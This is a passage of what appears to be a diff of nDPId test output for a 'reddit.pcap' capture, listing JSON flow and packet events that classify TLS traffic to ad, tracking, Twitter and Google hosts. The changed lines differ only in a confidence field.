+00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688712,"flow_last_seen":1605291688712,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688712,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4030,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605291688712,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688712,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQQAAAAAoAL9IGnKAAACBAWgBAIICoWLJ5EAAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688749,"flow_last_seen":1605291688749,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688749,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4145,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605291688749,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688749,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7IAAAAAoAL9ICgwAAACBAWgBAIICm3\/yPIAAAAAAQMDBw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4156,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688754,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAYqAcsBIEmLB5kd7IUo3\/YpAbvVxjGyAqhUIR0FoBJXgNU8AAACBAV4AQMDAwQCCArC10MXhYsnkQ=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4158,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688754,"pkt":"qtsDr8lk5EKm5WPyht1gBqw+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAG1cYBu1QhHQUxsgKpgBAB+1kkAAABAQgKhYsnu8LXQxc="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4161,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688712,"flow_last_seen":1605291688754,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688754,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688786,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbvfwoEYYXPjQDuzoBJXgOVIAAACBAV4AQMDAwQCCArC10M\/bf\/I8g=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688786,"pkt":"qtsDr8lk5EKm5WPyht1gCJDMACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAE38IBu+NAO7OBGGF0gBAB+2k0AAABAQgKbf\/JGMLXQz8="} 
-00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4269,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688749,"flow_last_seen":1605291688786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688786,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4414,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688712,"flow_last_seen":1605291688813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688813,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","ndpi": 